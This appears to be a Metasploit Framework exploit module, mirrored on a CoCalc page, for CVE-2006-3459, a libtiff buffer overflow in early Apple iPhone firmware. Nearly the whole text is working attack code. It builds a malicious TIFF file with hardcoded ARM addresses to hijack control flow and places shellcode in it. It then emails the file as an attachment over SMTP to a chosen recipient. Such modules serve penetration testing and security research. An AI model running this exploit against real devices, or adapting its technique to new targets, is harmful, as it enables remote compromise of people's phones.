Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/apple_ios/email/mobilemail_libtiff.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  #

10
  # This module sends email messages via smtp

11
  #

12
  include Msf::Exploit::Remote::SMTPDeliver

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Apple iOS MobileMail LibTIFF Buffer Overflow',

19
        'Description' => %q{

20
          This module exploits a buffer overflow in the version of

21
          libtiff shipped with firmware versions 1.00, 1.01, 1.02, and

22
          1.1.1 of the Apple iPhone. iPhones which have not had the BSD

23
          tools installed will need to use a special payload.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => ['hdm', 'kf'],

27
        'References' => [

28
          ['CVE', '2006-3459'],

29
          ['OSVDB', '27723'],

30
          ['BID', '19283']

31
        ],

32
        'Stance' => Msf::Exploit::Stance::Passive,

33
        'Payload' => {

34
          'Space' => 1800,

35
          'BadChars' => '',

36
          'Compat' => {

37
            'ConnectionType' => '-bind -find'

38
          }

39
        },

40
        'Arch' => ARCH_ARMLE,

41
        'Platform' => %w[osx],

42
        'Targets' => [

43
          [

44
            'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',

45
            {

46
              'Platform' => 'osx',

47


48
              # Scratch space for our shellcode and stack

49
              'Heap' => 0x00802000,

50


51
              # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib

52
              'Magic' => 0x300d562c

53
            }

54
          ],

55
        ],

56
        'DefaultTarget' => 0,

57
        'DisclosureDate' => '2006-08-01',

58
        'Notes' => {

59
          'Stability' => [ CRASH_SERVICE_DOWN ],

60
          'SideEffects' => [ IOC_IN_LOGS ],

61
          'Reliability' => [ UNRELIABLE_SESSION ]

62
        }

63
      )

64
    )

65
  end

66


67
  def autofilter

68
    false

69
  end

70


71
  def exploit

72
    exts = ['jpg', 'tiff', 'tif']

73


74
    gext = exts[rand(exts.length)]

75
    data = Rex::Text.rand_text_alpha(1..32)

76
    tiff = generate_tiff(target)

77


78
    msg = Rex::MIME::Message.new

79
    msg.mime_defaults

80
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(1..32)

81
    msg.to = datastore['MAILTO']

82
    msg.from = datastore['MAILFROM']

83


84
    msg.add_part(Rex::Text.encode_base64(data, "\r\n"), 'text/plain', 'base64', 'inline')

85
    msg.add_part_attachment(tiff, rand_text_alpha(1..32) + '.' + gext)

86


87
    send_message(msg.to_s)

88


89
    print_status('Waiting for a payload session (backgrounding)...')

90
  end

91


92
  def generate_tiff(targ)

93
    #

94
    # This is a TIFF file, we have a huge range of evasion

95
    # capabilities, but for now, we don't use them.

96
    #  - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday

97
    #

98


99
    lolz = 2048

100
    tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"

101
    tiff << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

102
    tiff << "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"

103
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"

104
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"

105
    tiff << "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"

106
    tiff << "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"

107
    tiff << "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"

108
    tiff << "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"

109
    tiff << "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"

110
    tiff << [lolz].pack('V')

111
    tiff << "\x84\x00\x00\x00\x00\x00\x00\x00"

112


113
    # Randomize the bajeezus out of our data

114
    hehe = rand_text(lolz)

115


116
    # Were going to candy mountain!

117
    hehe[120, 4] = [targ['Magic']].pack('V')

118


119
    # >> add r0, r4, #0x30

120
    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack('V')

121


122
    # Candy mountain, Charlie!

123
    # >> mov r1, sp

124


125
    # It will be an adventure!

126
    # >> mov r2, r8

127
    hehe[92, 4] = [ hehe.length ].pack('V')

128


129
    # Its a magic leoplurodon!

130
    # It has spoken!

131
    # It has shown us the way!

132
    # >> bl _memcpy

133


134
    # Its just over this bridge, Charlie!

135
    # This magical bridge!

136
    # >> ldr r3, [r4, #32]

137
    # >> ldrt r3, [pc], r3, lsr #30

138
    # >> str r3, [r4, #32]

139
    # >> ldr r3, [r4, #36]

140
    # >> ldrt r3, [pc], r3, lsr #30

141
    # >> str r3, [r4, #36]

142
    # >> ldr r3, [r4, #40]

143
    # >> ldrt r3, [pc], r3, lsr #30

144
    # >> str r3, [r4, #40]

145
    # >> ldr r3, [r4, #44]

146
    # >> ldrt r3, [pc], r3, lsr #30

147
    # >> str r3, [r4, #44]

148


149
    # We made it to candy mountain!

150
    # Go inside Charlie!

151
    # sub sp, r7, #0x14

152
    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack('V')

153


154
    # Goodbye Charlie!

155
    # ;; targ['Heap'] + 0x48 becomes the stack pointer

156
    # >> ldmia sp!, {r8, r10}

157


158
    # Hey, what the...!

159
    # >> ldmia sp!, {r4, r5, r6, r7, pc}

160


161
    # Return back to the copied heap data

162
    hehe[192, 4] = [ targ['Heap'] + 196 ].pack('V')

163


164
    # Insert our actual shellcode at heap location + 196

165
    hehe[196, payload.encoded.length] = payload.encoded

166


167
    tiff << hehe

168
  end

169
end

170


171